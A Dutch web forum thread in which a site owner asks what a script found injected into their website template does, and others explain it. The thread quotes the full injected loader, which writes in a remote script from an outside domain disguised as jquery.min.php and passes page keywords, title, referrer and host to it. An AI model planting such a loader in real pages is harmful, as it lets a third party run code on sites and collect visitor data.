Hulp gevraagd bij javascript ontcijferen

Status
Niet open voor verdere reacties.
B

Beemer1100

Nieuwe gebruiker
Lid geworden
2 mrt 2016
Berichten
2
Laat ik beginnen met te zeggen dat ik geen javascript expert ben. daar heb ik jullie hulp bij nodig.

Ik vond in 1 van mijn template een javascript welke daar niet thuis hoorde. deze heb ik ook verwijderd en tot zover geen probleem.
Alleen ben ik erg nieuwsgierig wat het script nu precies doet.

het script is
Code: 
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://mfarconstructions.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://mfarconstructions.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Het lijkt met mijn kennis van javascript, dat er een andere versie van Jquery geprobeerd word te laden. het domein wat hier genoemd word is van een indiaanse bouwbedrijf waar ik geen enkele connectie mee heb.

De vraag is of jullie mij kunnen vertellen wat het script zoal doet. buiten het feit dat het de website erg traag had gemaakt.
 
Er wordt geen jQuery geladen want de extensie is php (jquery.min.php).
De volgende code haalt de keywords uit je head
Code: 
k = (function(){
var keywords='';
var metas=document.getElementsByTagName('meta');
if(metas){
   for(var x=0,y=metas.length;x<y;x++){
      if(metas[x].name.toLowerCase()=="keywords"){
         keywords+=metas[x].content;
      }
   }
}
return keywords!=='' ? keywords : null;
})
Het lijkt erop dat het script de keywords + de title + de hostname + de url + de referer naar MfarConstructions.com verstuurt. Heb je ooit een script voor statistieken op je site gezet? Zegt de code "G91825" je iets, is dit een ID die je ergens gebruikt?

het domein wat hier genoemd word is van een indiaanse bouwbedrijf waar ik geen enkele connectie mee heb
Klik om te vergroten...
Het script dus eraf laten want onbekende php wilt niemand op z'n website.

Suc6. Have fun.
 
Laatst bewerkt:
Het is verstandig de beveiliging in bestand .htaccess aan te scherpen zodat gevaarlijke dingen in de URL met een 403 deny request worden geblokkeerd. Zie puntje 10 in mijn post hierover. Dit heeft verder niets te maken met het bestand jquery.min.php omdat je dit bestand zelf op de server hebt gezet en het niet door anderen is gebeurd.

Suc6.
 
Laatst bewerkt:
Status
Niet open voor verdere reacties.
Steun Ons

Nieuwste berichten

Terug
Bovenaan Onderaan